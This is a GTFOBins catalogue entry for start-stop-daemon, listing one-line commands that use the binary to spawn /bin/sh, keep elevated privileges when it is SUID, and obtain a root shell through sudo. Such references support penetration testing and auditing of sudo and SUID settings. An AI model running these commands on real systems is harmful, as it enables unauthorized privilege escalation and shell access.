Files
GTFOBins.github.io/_gtfobins/start-stop-daemon.md
2018-11-05 16:34:57 +01:00

12 lines
242 B
Markdown

---
functions:
shell:
- code: start-stop-daemon -n $RANDOM -S -x /bin/sh
suid:
- code: |
./start-stop-daemon -n $RANDOM -S -x /bin/sh -- -p
sudo:
- code: |
sudo start-stop-daemon -n $RANDOM -S -x /bin/sh
---